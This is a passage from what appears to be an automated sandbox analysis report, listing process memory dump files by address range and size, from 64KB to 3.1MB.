                                                                                                                                                                                                                                              • memory/5664-2433-0x0000025EEA310000-0x0000025EEA332000-memory.dmp

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                136KB

                                                                                                                                                                                                                                              • memory/5672-2568-0x000002891FD20000-0x000002891FD5C000-memory.dmp

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                240KB

                                                                                                                                                                                                                                              • memory/5672-2578-0x0000028921600000-0x0000028921630000-memory.dmp

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                192KB

                                                                                                                                                                                                                                              • memory/5672-2569-0x000002891FD70000-0x000002891FD80000-memory.dmp

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                64KB

                                                                                                                                                                                                                                              • memory/5672-2567-0x000002891F880000-0x000002891F986000-memory.dmp

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                1.0MB

                                                                                                                                                                                                                                              • memory/5672-2579-0x0000028939E50000-0x0000028939E82000-memory.dmp

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                200KB

                                                                                                                                                                                                                                              • memory/5672-2580-0x0000028939EC0000-0x0000028939F70000-memory.dmp

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                704KB

                                                                                                                                                                                                                                              • memory/5972-2517-0x0000000003F70000-0x0000000003F88000-memory.dmp

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                96KB

                                                                                                                                                                                                                                              • memory/5972-2519-0x00000000041E0000-0x0000000004230000-memory.dmp

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                320KB

                                                                                                                                                                                                                                              • memory/5972-2520-0x0000000004230000-0x0000000004266000-memory.dmp

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                216KB

                                                                                                                                                                                                                                              • memory/5972-2521-0x0000000004270000-0x00000000042B1000-memory.dmp

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                260KB

                                                                                                                                                                                                                                              • memory/5972-2522-0x00000000046F0000-0x00000000047C2000-memory.dmp

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                840KB

                                                                                                                                                                                                                                              • memory/6136-3179-0x00000000008E0000-0x0000000000C04000-memory.dmp

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                3.1MB

                                                                                                                                                                                                                                              • memory/6660-3196-0x0000000000430000-0x0000000000450000-memory.dmp

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                128KB